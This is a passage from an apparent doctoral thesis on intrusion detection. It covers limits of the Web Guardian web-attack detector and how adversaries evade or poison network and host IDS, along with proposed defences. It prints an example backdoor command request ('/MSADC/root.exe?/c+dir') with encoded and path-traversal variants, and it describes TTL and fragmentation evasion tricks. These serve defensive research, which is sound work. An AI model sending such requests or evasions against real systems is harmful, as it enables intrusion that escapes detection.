TCP connection, return the home page) only on the basis of (a) very reliable mod-
els, e.g. with very few false alarms, (b) output probabilities well under threshold,
(c) multiple anomalies. Otherwise, we may provide for more safe counteractions.
For example, the work [Valeur (2006)] proposes a anomaly-driven reverse proxy to
protect web applications. This approach is very interesting to provide for automated
counteractions that may work well even with some false alarm. If an anomalous re-
quest is detected, it is forwarded to a copy of the website that do not hold sensitive
content. In such a way, even if a false alert is raised, legitimate users may still access
to website contents that are not sensitive (e.g. public).
4.5 Limitations, proposed solutions and future work

With HMM-Web we showed experimentally how Hidden Markov Models may be
exploited to detect web application attacks, and thus protect web services. Due to
the ad-hoc nature of web applications, the anomaly-based approach of HMM-Web
is very eective to detect input validation attacks. Moreover, HMM-Web may save
a lot of time to security administrators, since it is unsupervised and deals with dirty
web trac. The main limitation of HMM-Web is that we may detect only attacks
that submit malicious input through HTTP GET requests. Furthermore, it does
not support any automatic counteraction.
Thus, we ideated Web Guardian. Through Web Guardian we may potentially

detect any attack exploiting input validation vulnerabilities, or automated attacks
against web services. Also, we may counteract in real time if one or more anomalous
requests are found. Some preliminary experiments show that Web Guardian allows
to accurately detect web attacks, with low false alarm rates. Of course, a more ex-
tensive testing is necessary, but our approach appears very promising. Nevertheless,
14
All attacks inside Λ were still detected.
15
For each one, we may evaluate the number of false alarms they raise on average and the number
of training samples. These two parameters are used as reference to outline the reliability of each
model.
in our world does not exist a perfect system, and denitely Web Guardian makes
no exception. So, it is important to recognize the main limitations of our detection
system.
First, Web Guardian models (web application) attribute inputs generalising let-
ters and numbers. This allows a signicant reduction of the learning time of HMM,
and false positives due to random inputs (e.g. session identiers). For example,
numbers between 100 and 999 are represented by the same sample {N,N,N}. Assum-
ing that such numers are submitted to an attribute, e.g. to identify a category inside
the website, some of them may not be accepted by the web application (e.g. because
for some of them there is no category associated), causing an error. An attacker
may exploit this exception to gain information about the target application. In
fact, two attacks in Φ used a similar a technique, and they have not been detected
by Web Guardian. This example is useful to highlight a general limitation of our
detection system: it may not detect attacks targeting the logic of web applications.
That is, we are not modelling what is the internal processing of web applications.
To this end, other web trac features are necessary. Thus, a possible improvement
of Web Guardian may be the modellation of new features regarding the logic of web
applications. Currently, the set of extracted features mainly supports the detec-
tion of input validation attacks, because they are the most popular and threatening
attacks.
Another limitation of Web Guardian is inherited by the traditional anomaly-
based approach to the detection of computer intrusions. That is, we may evidence
detailed anomalies, but currently these are not associated with a description of the
attack, as in signature-based systems. To overcome this limitation, we are currently
working on the automatic classication of anomalies. Also we are working on the
automatic inference of the attack class, given an anomaly. Our idea is similar to
that proposed in [Robertson et al. (2006)] and, in particular [Bolzoni et al. (2009)].
Finally, as we will further discuss in Section 5.5.1.1, anomaly-based systems
16
may be subject to false alarm injection. Let us suppose that Web Guardian is
protecting a website in real-time. An adversary (using a unique IP address) may
deliberately submit a very high number of web requests (e.g. 100,000) that do not
harm the website, but raise a lot of (false) alarms. Among these requests, he may
submit the real exploit against the monitored web services. In this case, it is likely
that the security administrator do not veries all alerts (100,000!). He may verify
only a portion of them, and by assessing that actually they are not dangerous, he
may throw out all alerts having the same source. Thus the attacker can successfully
compromise the monitored web services, without actually being detected. Of course,
in this case we are assuming that no automatic counteraction is performed by Web
Guardian against the true exploit. Thus automatic counteractions may actually
face this kind of attacks. However, as matter of fact, the false alarm injection attacks
are not currently addressed by Web Guardian. As future work, we intend to research
solutions to this issue also.
16
Actually, as we will discuss in Chapter 5, all IDS suer from this problem.
Figure 4.1: HMM-Web scheme. The Parser processes the request URI and identies
the web application (i.e. search.php) and its input query. Applying a threshold
on the probability value associated to the codied query, it is labeled as legiti-
mate/anomalous. The threshold depends on the web application probability and
the α parameter.
70000
TRAINING SET - The 14th most frequent web applications
60000
Number of queries
50000
40000
30000
20000
10000
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
Web Application
11%
10%
Percentage of attacks
9%
8%
7%
6%
5%
4%
3%
2%
1%
0% 1 2 3 4 5 6 7 8 9 10 11 12 13 14
Web Application
Figure 4.2: Distribution of queries and percentage of attacks for the 14 most frequent
web applications.
Figure 4.3: Average DR and FPR for dierent values of α and a single HMM per
ensemble. The proposed query codication solution is compared with that used in
[Kruegel et al. (2005) (a)].
Figure 4.4: Average DR and FPR for dierent values of α either with single or
multiple HMM per ensemble.
Figure 4.5: Architecture of Web Guardian. Our detection system may be controlled
through a web interface.
Figure 4.6: Some attacks detected by Web Guardian (as showed by our web inter-
face). These attacks were contained in set of training requests.
Chapter 5
Intrusion Detection and
Adversarial Environment
When I have won a victory I do not repeat my tactics but

respond to circumstances in an innite variety of ways.
Sun Tzu
The aim of today's cyber criminals is to realize attacks without being detected
by security administrators (or computer users). For example, this may allow the
attacker to place access points on violated computers for further (stealthy) crim-
inal actions. In other terms, the IDS itself may be deliberately attacked by a
skilled adversary. Some recent work tried to nd the best protection strategy by
leveraging on the denition of an attacker's model [Cordasco and Wetzel (2009)]
or assuming a rational attacker and employing a game theoretical framework
[Chen and Leneutre (2009)]. In any case, a rational attacker leverages on the weak-
est component of an IDS to compromise the reliability of the entire system, possibly,
with minimum cost.
It is easy to see that this problem cannot be completely avoided, as absolute
security does not exist. On the other hand, the recognition of such a threat, and its
knowledge may help devising an IDS model which reduces the impact of the threat.
Of course, many research papers in some way have dealt with this problem.
Unfortunately, such works focus on specic topics, discuss about attacks against
specic IDSs and use dierent terms for same general concepts. Often the analysis is
focused on specic phases of the intrusion detection task, and the mutual dependence
of each phase from the others is neglected. There is a good reason for this, since
the problem is fairly complex, and must consider many (uncertain) variables. As a
consequence, an overall picture of the problem is still lacking.
In this Chapter of the thesis we give our contribution to ll this gap. First, we
subdivide the general design of IDS into dierent phases and components. To this
end we refer to the CIDF scheme presented in Section 1.3. In particular, we further
subdivide the analysis box of the CIDF scheme according to the analogy between
intrusion detection and pattern recognition (see Section 1.3.1).
Then, we critically analyze how the adversarial environment may aect the IDS
in each one of its components. This study allows gaining a wide knowledge of the
94 Chapter 5. Intrusion Detection and Adversarial Environment
problem and to support the design of robust IDS solutions. Furthermore, if the goal
is to choose the best security solution on the market, our analysis may provide
concrete support. Some concepts will be given through real world examples, mainly
related to the web, as it currently accounts for the majority of vulnerabilities (see
Section 2.1).
At the end of the Chapter, it will be clear that the architecture of Flux Buster
and Web Guardian reects many of the key points we outline for adversary-aware
IDS solutions. This is important, as we strongly believe that adversary-aware IDS
solutions are the right response to current and future security threats.
The Chapter is organized as follows. A detailed analysis of data acquisition, data

preprocessing, feature selection, model selection, and classication/result analysis
steps is reported in Sections 5.1, 5.2, 5.3, 5.4 and 5.5 respectively. Sections 5.6, 5.7
analyze the impact of an adversarial environment in storage and countermeasure
boxes. Then, Section 5.8 highlights the key points which derive from the study of
the whole problem and gives to the reader a guideline for the development/choice of
adversary-aware IDS solutions. Finally, in Section 5.9 conclusions are drawn, and
possible future work directions are outlined.
5.1 Data Acquisition

In this Section we discuss about problems and solutions of the data acquisition
step in an adversarial environment. After a brief presentation of the motivations
and purposes of the data acquisition phase, we will discuss about the impact of
the adversarial environment, with reference to the two main classes of IDS: NIDS
(Section 5.1.1) and HIDS (Section 5.1.2).
Motivation and purposes To perform intrusion detection, it is needed to acquire

input data about events occurring on computer systems. In the data acquisition step
these events are represented in a suitable way to be further analyzed. This step is of
key importance, because from acquired data it is desirable to extract (measure) all
the necessary features that allow distinguishing legitimate activities from attacks.
Event features related to computer systems represent the information source that
supports the intrusion detection task.
Problem overview Some inaccuracy in the design of the representation of events

will compromise the reliability of the results of the analysis box, because an adver-
sary can either exploit lacks of details in the representation of events, or induce a
awed event representation. Some inaccuracies may be addressed with an a pos-
teriori analysis, that is, verifying what is actually occurring on monitored host(s),
when an alert is generated. Such an analysis will be discussed in Section 5.5.4.
5.1. Data Acquisition 95
5.1.1 Network Data Acquisition

Motivation and purposes With respect to HIDS, NIDS are relatively easy to
deploy because they only need a network node, while HIDS have to be installed on
the monitored computers. Due to their nature, NIDS are useful to detect attacks
that involve low level manipulation of the network trac. In particular, NIDS allow
detecting attacks against multiple machines on the network. Furthermore, for an
attacker it may be dicult to remove the traces of detected attacks, because NIDS
are not placed on target machines. NIDS sensors are deployed at a specic network
node, and typically send the results of their analysis to a central console running in
a dedicated host.
It is worth noting that NIDS can be easily employed to prevent intrusions

[Lunt et al. (1992)], as they may analyze network trac before it is processed by
the destination hosts.
5.1.1.1 Adversary actions against Network Data Acquisition: Problems
The rst problem of NIDS is that they can only simulate packet processing as
performed by destination hosts. As pointed out in [Ptacek and Newsham (1998)],
NIDS usually rely upon a mechanism of data collection (called passive protocol
analysis) which is fundamentally awed because there isn't enough information on
the wire on which to base conclusions about what is actually happening on networked
machines.
The reason for this gap relies on the fact that network trac is typically pro-
cessed by dierent host-side operating systems and applications. Such dierent
systems can process the network trac in a way not fully adherent to specic stan-
dards (i.e., RFC), or they implement only some functionalities described by these
standards. In addition, even if dierent implementations are perfectly adherent to a
specic standard, they might process the trac in a dierent way in situations that
are not considered by the standards. Finally, destination hosts can process the traf-
c at dierent network nodes, therefore with dierent trac views. Thus it follows
that, in principle, a NIDS should be designed to incorporate all the knowledge on
the mechanisms of trac processing employed by operating systems and application
software, as well as the network topology. Unfortunately, this is denitely a hard
task in a real scenario. Thus, typically, the NIDS use a pre-dened mechanism of
trac processing that is assumed to be coherent with all the hosts in the network,
and it is assumed that it is placed in the same network node of the monitored hosts.
This lack of knowledge can lead to a awed generation of events. A number of

papers in the literature showed how such fake events can be used to evade an IDS.
We note that similar techniques can be used by an adversary to pollute the training
data used by security specialists to design and deploy NIDS. Therefore, it is useful
to review these techniques in order to understand how an adversary can attack the
learning phase of NIDS.
Attack techniques against network data acquisition First of all, it is worth

to note that in switched networks a NIDS sensor can only analyze packets that travel
into its own segment. As a consequence, an evasion can occur simply because an
attack do not involve this segment. Generally, the correct NIDS sensor placement
is a very important task, because an incorrect choice can lead to not observable
(evading) attacks against critical network assets.
To the best of our knowledge, the most comprehensive work to date that thor-
oughly analyze evasion attacks against NIDS is [Ptacek and Newsham (1998)]. The
problems presented there still represent open issues and concrete threats, as con-
rmed in [Hernacki et al. (2005)]. In [Ptacek and Newsham (1998)], the evasion of
NIDS (that in such a paper is called elusion ), is posed in terms of insertion and
exclusion
1 of packets in the trac as seen by the NIDS. An insertion attack consists
in inducing a NIDS to accept one or more packet(s) that will be rejected by the tar-
get system, conversely, an exclusion attack consists in inducing a NIDS to discard
(or to ignore) a packet that will be accepted by the target system.
This goal may be achieved by means of some well-known evading attacks against
NIDS: tunneling, desynchronization, encoding variations, segmentation and reorder-
ing [Hernacki et al. (2005)].
The tunneling technique aims to hide an attack enclosing it in a tunnel
[Hernacki et al. (2005)]. The tunnel represents a type of trac that is ignored or not
observable by the monitor, so it can be classied as an exclusion attack. An example
of tunneling for the evasion of intrusion detection, can be the use of an encrypted
channel to hide the attacks (i.e. using Secure SHell (SSH) [RFC 4252 (2006)])
[Brown (2003)]. An encrypted channel is used to guarantee the condentiality of an
information ow during its travel from the source to the destination. Even if the
data is captured by an attacker it is very dicult to (nd the correct decryption
key and) reconstruct the original ow. The NIDS has the same problem, as it can-
not analyze encrypted trac, like SSH or HTTPS [RFC 2818 (2000)], unless it is
provided with the correct decryption key. Nevertheless, this increases the exposi-
tion of the trac ow to condentiality attacks, since a vulnerability on the NIDS
may compromise the condentiality of any encrypted trac ow passing through
it. Tunneling can also be accomplished by using non standard ports. For example,
many IDS identify the monitored services through the port eld of the IP protocol,
thus if the port eld of packets does not match with the standard port, (e.g. HTTP
trac on the port 22, conventionally used by SSH trac), its analysis can fail or can
be neglected. In practice, the tunneling technique is the routinely used for evading
NIDS [Hernacki et al. (2005)].
A desynchronization attack [Hernacki et al. (2005)] aims to exploit dierences

in the overall view of the network trac between the NIDS sensor, and the monitored
host(s). The NIDS is forced to be out of phase with respect to the monitored
host(s) for an entire session. This attack can be realized using either insertion or
exclusion actions, and can be based on the Time To Live (TTL) eld of an IPv4
1
We use this term for the sake of clarity, but the original term was evasion.
packet [IPv4]. Let us recall that the value of this eld is decreased every time
the packet pass through a router in order to avoid possible loops of trac ows.
Thus, if a router is placed between the NIDS (that monitors outbound an inbound
trac) and a monitored host, an attacker can set the value of the TTL (Time
To Live) eld of IPv4 packets so that it is large enough to reach the sensor, but
small enough to cause the dropping of the packet prior to reaching the destination
[Ptacek and Newsham (1998)] (this is an insertion attack). Now, if the attacker
sends a (apparent) packet duplicate (i.e. same sequence id), changing the TTL eld
and its content, such a packet is typically recognized by the NIDS as a duplicate
and then discarded, while it will reach the destination. Such manipulations could
be detected by NIDS by storing and comparing the entire content of the packet, but
unfortunately this approach can be very time and memory expensive in environment
characterized by high bit rates. Even if the sensor is designed to analyze new packets
regardless duplication, it is possible to realize the same attack (through exclusion),
by rst sending the packet with malicious content to the destination, and then
sending a duplicate packet with legitimate content so that it reaches only the NIDS.
As the NIDS takes into account the latest duplicate packet, then the malicious
content is not detected. Let us make another example: following the relative RFC
2616, the rst line of an HTTP request (the request line ) must specify the Method,
Uniform Resource Identifier (URI) and HTTP version. From our experience,
a modern web server like Apache, accepts also a number of empty lines (Carriage
Return (CF) and Line Feed (LF) characters) before the request line. A NIDS that
does not consider this issue can discard such a request even if it has been processed
successfully by the target. In this case, it loses the request URI and probably it is
forced to be out of phase (desynchronized) for the entire HTTP session, because
many web attacks involve request URI manipulations (see Chapter 4).
Encoding variations represent another evasion method. These are realized
through the encoding of a trac message such that its semantic on the NIDS is
dierent from the semantic on the target [Hernacki et al. (2005)]. A typical exam-
ple can be the use of encoded characters in a request URI of a HTTP message.
Each character in a request URI can be encoded using the % symbol followed by
its position on the ASCII table. Request URI like /MSADC/root.exe?/c+dir and
%2fMS%41D%43%2f%72oot.%65x%65%3f%2f%61+di%72 are equivalent from the point
of view of a target HTTP server (%2f is the encoding of /, %41 is the encod-
ing of A, etc.), while a NIDS that does not apply the same character conversion,
will fail during the analysis phase. This issue may appear easy to solve, but in
a heterogeneous environment, e.g. where dierent HTTP servers are employed,
dierent encoding schemes should be taken into account. In this case, not only
it is necessary to know every encoding scheme accepted by each server type, but
also it is necessary to apply the correct decoding process according to the des-
tination host. For example, there are some cases in which a character can be
equivalent to another: request URIs may be case insensitive, (e.g. /InDeX.HtmL
is equivalent to /index.html) and some Windows servers can accept \ as equiv-
alent of /. In addition, the trac message semantics can still remain the same
Figure 5.1: A skilled attacker evades NIDS detection exploiting a awed reconstruc-
tion of the trac at application level (i.e. through encoding variations). He modied
his attack in order to both compromise the web server and evade detection.
from the point of view of the destination host by applying more skilled manipu-
/MSADC/root.exe have
lations. For example, a request URI the same meaning of
/MSADC/../MSADC/../MSADC/root.exe, because /MSADC/../ identies the root di-
rectory. Fig. 5.1 shows how an attacker may evade a NIDS that do not consider
this equivalence. Since the NIDS does not apply the URI conversion (made by the
victim), the string matching between the known attack /MSADC/root.exe?/c+dir
and the current request URI fails. Thus, the attack is successful and no alerts are
raised.
The segmentation and reordering technique subdivides the network trac in

multiple parts (also duplicates) sent in an order such that the reconstruction made
by the NIDS diers from that made by the destination hosts. This technique can
be applied at multiple levels of the protocol stack (for example: IPv4, TCP, HTTP
allows for trac segmentation). Such an attack is still very eective, even if it has
been well analyzed previously [Hernacki et al. (2005)].
Summing up, it is possible to realize complex and eective evading attacks

against NIDS. The authors in [Gorton and Champion (2003)] showed that com-
monly a combination of factors is required to evade detection. They proposed a
geometric approach to NIDS evasion: three dierent NIDS evasion techniques were
combined into a three-dimensional testing space, manipulating the TCP/IP protocol
and showing regions where the combined evasion techniques were not detected.
5.1.1.2 Adversarial environment against NIDS: Solutions
As previously discussed, a relevant problem of Network-based IDS is the eect of am-

biguous trac (i.e. packet duplicates). A proposed solution for preventing evasion
attacks that exploit such a weakness is the bifurcating analysis. The NIDS sensor
deals with ambiguous trac streams by instantiating separate analysis threads for
each possible interpretation of the trac [Paxson and Handley (1999)]. Obviously,
in this case, it is necessary a trade-o between maximum number of thread (spatial
and computational resources) and the completeness of the method.
A device that has been proposed to increase the robustness against ambiguous
trac is the trac normalizer. This is a network forwarding element that at-
tempts to eliminate ambiguous network trac, reducing the amount of connection
state that the monitor must manage. A mandatory characteristic for such a device
is to preserve end-to-end semantics, and to guarantee high performance. A number
of architectural considerations are associated with the design of a trac normalizer
[Paxson and Handley (1999), Handley et al. (2001)]. Of course, the communication
mechanism between the normalizer and the monitor must be carefully designed. In
addition, attacks against the normalizer itself must be taken into account. Provided
that a trac normalizer with a suitable design is available, it can prevent evasion
attacks that leverage either on ambiguous TCP stream contents, or on the manipu-
lation of TCP connection state, or on the ooding of the monitor with bogus state
[Paxson and Handley (1999), Handley et al. (2001)].
Some works have attempted to compare Network-based solutions with Host-

based solutions from the point of view of attacks to the data acquisition mod-
ule. The authors in [Basicevic et al. (2005)], showed that a distributed client-based
NIDS may be more robust with respect to HIPS (Host-based Intrusion Prevention
Systems) against evasion techniques. That paper conrms that the use of client-
based NIDS increases the overall robustness against evasion methods, even if no
denitive conclusion can be drawn.
Furthermore, all network-based solutions must cope with performance is-

sues, especially in high speed networks. For example, in the recent paper
[Antichi et al. (2009)], the authors propose an approach based on counting bloom
lters to perform pattern matching (i.e. for signature-based NIDS) in high speed
networks, without reassembly of packets. Their experimental results evidence that
counting bloom lters may spot fragmentation attacks without performing any
packet reassembly, which may be expensive in high speed networks. On the other
hand, a number of false positive matches (i.e. false alarms) are possible with such a
method. So, in general, countermeasures against network data acquisition attacks

may be the result of a trade-o with some performance constraints.
Summing up, the eectiveness of NIDS is strictly related to its capabilities in

guaranteeing a trac view and packet processing as similar as possible to those
of the monitored host(s). This is accomplished by means of a careful design of
the logical network architecture and the related placing of the NIDS. To this end, a
NIDS client-based distributed approach, even if not always applicable, may represent
a solution. This approach pregures a NIDS sensor for each monitored host. In
practice, it is sucient to place a network sensor for each collision domain, i.e.,
a network segment where the host(s) share a physical link, so that the sensor can
sni the trac related to every host in this segment. Thus, the trac seen by
the sensor is the same that reaches the monitored hosts. Even if such a task often
rely on the human experience and common rules [Northcutt and Novak (2001)], a
systematic approach has been also proposed [Rolando (2006)]. The shortcoming of
that approach is that correct NIDS placement requires the knowledge of detailed
attack denitions, that is not even available (of course, it is not available for new
attacks). In addition, new protocols, new technologies and applications, with their
own specic security vulnerabilities, allow for new techniques that can aect the
network-based data acquisition.
Finally, it is worth noting that a large number of problems in network data

acquisition can be dramatically reduced if the operating system, and applications
running on the protected hosts are homogeneous and updated to the latest version.
In this case, NIDS can be tuned so that its trac interpretation is very close to that
of operating systems/applications running at host-side. Also, to deal with these
problems it is useful to correlate information with dierent source, e.g. application
and operating system logs from networked host(s). However, this task is complicated
by the adoption of virtual machines, since a single network interface might be shared
by many virtual network interfaces, on dierent virtual machines (e.g. with dierent
OS and running applications).
5.1.2 Host Data acquisition

Motivation and purposes A Host-based IDS catches events related to a single
host, by using information from the operating system and/or from applications
logs. Therefore, HIDS are good at discerning attacks that are initiated by local
users and which involve misuse of the capabilities of one host. HIDS are thus aimed
at detecting attacks against critical information stored in a computer. It is easy to
see that HIDS are not aected by the previously discussed issues related to the lack
of knowledge of NIDS about trac processing performed by destination hosts.
5.1.3 Adversarial environment against HIDS: Problems

HIDS are not aected by network events that occur at lower level because they
only interpret high level logging information. As an example, an attack exploit-
ing vulnerabilities in the transition between dierent versions of IP (IPv4, IPv6)

[Lancaster (2007)], which involve low (TCP/IP) level manipulations, cannot be de-
tected with a pure Host-based solution.
A critical aspect of host data acquisition is as follows. An attacker may exploit

some internal bug of the monitored applications whose eects are not reported in
the log les, and thus this attack is not observable by the HIDS, and detection is
evaded. For example, a web server typically stores the elds of an HTTP request
line in a log le after it is processed. An application specic HIDS can use this log
le to detect evidences of web attacks. Nevertheless, this HIDS can not be capable
of working as expected if an attacker exploits a vulnerability in the interpretation
phase of HTTP requests. In this case data stored in the log le are related to
a malicious interpretation of HTTP requests, and thus an adversary can exploit
such a situation to evade the HIDS or to aect the integrity of the sensor's input
data. Therefore, it is important to evaluate the reliability of input data and take
into account possible failures of the processing steps that produce those data. It is
easy to see that such failures may inuence negatively the expected analysis results
during the training/operational phase of the IDS.
Another important issue of host data acquisition is related to the practical de-
ployment of sensors. In some cases, host sensors may be dicult to be deployed.
For example, this is the case of a hotspot, which oers Internet access to any com-
puter having the access credentials. Also, the deployment of host sensors is typically
problematic in the case of palmtops or mobile devices.
Finally, an evident weakness of HIDS in front of successful attacks is the fact that
they are placed on target machines. Thus, if an attacker exploits a vulnerability on
that machine, he may disable or aect the HIDS sensor processing (see g. 5.2). To-
day, this is perhaps one of the main goals of a rootkit [Hoglund and Butler (2006)],
i.e. malicious software which runs with high privileges on the target machine, with-
out the need for user's (e.g. administrator's) access credentials. One of the most
popular rootkits is FU, which modies data structures employed by the Windows
XP kernel (Direct Kernel Object Manipulation) in order to hide the presence of les,
processes, device drivers, etc. [Butler and Hoglund (2004)]. Such a technique pre-
vents the operating system itself (by means of the system call functions) to retrieve
information related to its state (e.g. running applications and loaded drivers).
5.1.4 Adversarial environment against HIDS: Solutions

Whereas in NIDS the input is well-dened as it is made up of TCP/IP network
trac, HIDS solutions are often specic for an application and/or an operating
system, and the inputs may vary accordingly (i.e. web server logs, database logs,
operating system calls, etc.). As a consequence, the eects of an adversary targeting
the HIDS, and the related solutions strictly depend on the asset protected by the
HIDS. Let us make an example. If we have a computer dedicated to act as a web
server, administered by a trusty person, and congured with well-crafted internal
access policies, we can reasonably assume that the probability of occurrence of
Figure 5.2: After the web server is compromised, a skilled attacker evades HIDS
detection by disabling or aecting the input of host sensors. Typically this is one of
the goals of a rootkit.
insider intrusions is much lower than that of external intrusions. This computer will
only have one open port (port 80) associated to the HTTP service, and it will not
consider requests for other protocols or services.
Thus, an external intruder may access this system through HTTP requests only.
In this case, the security of the system can be entrusted to a HIDS sensor that
monitors HTTP server logs, and, if a database is used, another HIDS sensor that
monitors database queries. Furthermore, an additional HIDS sensor that monitors
open ports and running applications can be useful to detect suspicious host events.
For example, after a successful attack, new network services, such as a SSH server,
may be activated in order to guarantee further access. Conversely, in this case the
use of a HIDS that monitors only operating system calls and/or running applications
is not sucient, because the critical asset of this host is related to the HTTP service.
This example points out the need for a careful choice of the input data source to be
analyzed by HIDS, the input choice depending on the services oered by that host,
and on the category of users accessing the system.
Typically, in order to detect attacks involving multiple hosts, a centralized mon-

itor console is used to apply common policies and correlate alarms raised at in-
dividual hosts [IBM ISS IPS, Cisco IPS]. Intuitively, in such an architecture, the
centralized console represents a high critical device, and thus it should be isolated
from monitored machines and external network.
Finally, the principal solution proposed so far to isolate HIDS sensors from tar-
get machines is based on virtualization. The monitored machine runs in a virtual
5.2. Data pre-processing 103
environment and, by means of a Virtual Machine Monitor (VMM), the IDS ac-
quires data related to the state of the monitored machine. The VMM is able to
retrieve low level information regarding the monitored machine, e.g. bytes written
on physical memory or disk by the monitored machine. The HIDS interacts with
an Operating System (OS) library, whose task is to translate low level information
coming from the VMM, into high (OS) level information (e.g., list of running pro-
cesses, contents of a le), inside the monitored machine. Such an operation is also
called Virtual Machine Introspection (VMI) [Garnkel and Rosenblum (2003)]. It
is easy to see that VMI requires a dierent OS library depending on the operat-
ing system of the monitored machine. Due to the exibility of the virtualization
approach, in the last years many works applied this approach to solve dierent
adversarial problems. For example, virtualization has been proposed for rootkit be-
havior proling [Gadaleta et al. (2009)] or defeat stack-based buer overow attacks
[Riley et al. (2009)].
Virtualization is a very promising approach to strengthen HIDS solutions, nev-
ertheless, some main issues still remain open:
• virtualization vulnerabilities; an attacker may exploit aws in the de-

sign/implementation of the VMM in order to prevent the correct acquisition
of data from the monitored machine.
• OS library vulnerabilities; since such a library relies on the a-priori knowledge

of data structures employed by the OS kernel, if the attacker is able to modify
such data structures in the target machine (e.g. with Direct Kernel Object
Manipulation techniques), the library may fail to correctly infer its state.
Thus, in practice, the relevance of these issues should be always compared to the
benets of the virtualization approach for HIDS.
5.2 Data pre-processing

Motivation and purposes The data preprocessing step can be considered as the
rst phase in which data analysis is performed. This step is aimed at performing
some kind of noise removal and data enhancement on data extracted in the data
acquisition step, so that the resulting data exhibit a higher signal-to-noise ratio.
In this context the noise can be dened as information that is not useful, or even
counterproductive, when distinguishing between attacks and legitimate activities.
On the other hand, enhancements typically take into account a priori information
regarding the domain of the intrusion detection problem. It is worth to note that
in other application domains, such as image understanding, all the processing steps,
from raw data to the nal conceptual interpretation, have been deeply investigated
over the years, and a large number of techniques are available. Thus, intrusion de-
tection can rely on concepts developed in other well-established application domains
to better design the dierent stages of information processing needed to detect in-
truders. As far as this stage is concerned, it is easy to see that critical information
can be lost if we aim to remove all noisy patterns, or enhance all relevant events,
as typically at this stage only a coarse analysis of data can be performed. This
fact can be explained by observing that typically in the early stage of data process-
ing, low-level information is processed. As a consequence, only noise that can be
clearly associated with low-level data representation can be removed. Other kind
of noise can be only detected when data is analyzed and represented at higher level
(e.g., alarms), because it is possible to use higher-level concepts that allow remov-
ing noisy patterns, as well as enhancing relevant information. Thus, the goal of the
data enhancement phase should not be to remove all noisy patterns, but only those
patterns which can be considered as noise with high condence. This aspect will be
discussed in detail in the following Section.
5.2.1 Adversarial environment against data pre-processing: Prob-

lems
In the intrusion detection domain, we can dene as noise all the information that at
rst seems representative of a class of activities, i.e. legitimate or attack activities,
while actually it is not.
It is worth to point out a concept that we will recall throughout this Chapter.
Given a piece of information for which we can conclude that it is not related to le-
gitimate activities, then we cannot necessarily conclude that it is related to attacks
against the monitored machines, and vice versa. That is, some information, i.e.,
noise, can neither describe legitimate activities, nor attacks against the monitored
machines. As this information is not representative of any of the two classes (legit-
imate trac and attacks), it should be discarded, because its use in further steps
can be counterproductive or, at least, not useful. On the other hand, if this noisy
information is used in further steps, it can cause an erroneous characterization of
attacks and/or legitimate activities.
As data preprocessing involves data removal or data modication aimed at re-

moving noise or enhancing some characteristics, it is easy to see that an adversary
can leverage on weaknesses of this task to deliberately inject malicious noise and
aect the correct characterization of attacks and/or legitimate activities in further
steps. Typically, attacks against the pre-processing stage can be either aimed to
erroneously induce the classication of attack patterns as noise, or to force the
inclusion of noisy patterns into the pool of legitimate trac patterns.
5.2.2 Adversarial environment against data preprocessing: Solu-

tions
In anomaly-based IDS, a model of legitimate activities must be designed. To this
end, data collected from a network node should be pre-processed in order to be as
much attack-free as possible. In this case, data preprocessing can be performed by
using misuse-based IDS to detect known attack patterns in the network trac. For
example, Snort, the popular signature-based NIDS [Snort] can be used. The trac
5.2. Data pre-processing 105
associated to these attack patterns can be removed, while the remaining trac can
be considered as associated to legitimate activities.
However, trac associated to new attacks or other spurious trac which is
not representative of typical legitimate activity might still be present. It is expected
that this kind of trac accounts for a very small percentage of the pre-processed
data. This is a reasonable assumption, because typically most of the users perform
legitimate actions, that is, they use resources or services as expected. The latter
assumption is the basis of outlier detection techniques [Tandon et al. (2004)].
Such techniques are aimed at evidencing patterns having dierent characteristics
w.r.t. the majority of patterns contained in a set. By means of outlier detection
techniques it is possible to achieve a good classication accuracy of the informa-
tion related to legitimate activity. For this reason, this technique is well-suited in
anomaly-based IDS.
Conceptually, outlier detection techniques may also be used to identify attack
activities, and the related trac patterns. This result can be achieved by exploiting
the data collected by the so-called honeypots, i.e., computers or networks specif-
ically designed to act as decoy for attackers [Kreibich and Crowcroft (2003)]. As
these systems are not designed to oer network services, users performing legiti-
mate operations should not access these systems. So, the activities performed on
these systems can be classied as suspicious and probably related to attacks. That
is, in principle, outlier detection techniques may help in better identifying informa-
tion related to attacks, that can be further used to design misuse-based systems.
However, it can be easily seen that if an adversary discovers which hosts are acting
as honeypots, then the trac collected by the host can be maliciously polluted, and
we should be very careful in considering the majority of information as related to
attacks.
An example of a system that collects both legitimate activity and attack patterns
is described in [Newsome et al. (2005)] (Polygraph). In that work data preprocess-
ing is made up of a network ow classier. This system tags the trac as legitimate
or suspicious for the detection of worm activities, and innocuous and suspicious ow
pools are generated, respectively. In particular, a misuse (signature) based detector
is trained using trac belonging to both classes of trac. This system is vulnerable
as it does not take into account that even if suspicious trac is not representative
of the legitimate class, it is not necessarily representative of the attack class. This
vulnerability has been shown in [Perdisci et al. (2006) (a), Newsome et al. (2006)],
and it will be further discussed in Section 5.3.
An interesting question that arises is the following: Could attacks against the
learning phase of an IDS be dened as outliers, and thus removed from the training
data?. The answer is yes, at least for simple models. Let us consider an anomaly-
based IDS that looks for buer overows attempts on protected hosts by analyzing
the content of FTP commands. A (stack-based) buer overow attack exploits in-
sucient bounds checking on a buer located on the stack to overow the buer,
and overwrite (hijacking) the return address of the currently executing function, so
that malicious code is executed [Aleph One]. This type of attack is clearly charac-
terized by a command length larger w.r.t. normal (legitimate) commands, because

the input length must be larger than the buer size. Thus, the training phase can
be accomplished by modeling the length of normal FTP commands.
If an adversary was able to include in the training set FTP commands with arbi-
trary large content length, he would probably aect the correct model inference. In
this case, a further buer overow attack would be probably classied as legitimate.
It is not necessary that such commands reect attacks against the monitored hosts.
Such malicious commands have just similar features (i.e. length) w.r.t attack com-
mands. In this case, since malicious commands are characterized by higher length
w.r.t. legitimate commands, they may be removed by means of outlier detection
techniques.
However, it should be recognized that while this example is very simple, in

practice outlier detection is more dicult to apply as it involves a tradeo between
noise removal and information preserving. An additional diculty in applying noise
removal approaches arises when legitimate patterns are not the great majority of
training examples, because, for example, a small training set is considered, and an
attacker knows the time interval in which training data are collected.
Data pre-processing also involves the enhancement phase, which is typically

related to the removal of incomplete data (e.g. an incomplete HTTP session). As
incomplete data may not allow extracting some relevant information on the trac
they are associated to (e.g., the end time of an HTTP session), they can be useless
and thus should be discarded. Furthermore, data enhancement can also be per-
formed as a set of data transformations aimed at better distinguishing attacks from
legitimate activities. An example of this kind of pre-processing technique can be
found in [Polychronakis et al. (2007)], where polymorphic shellcode attacks are de-
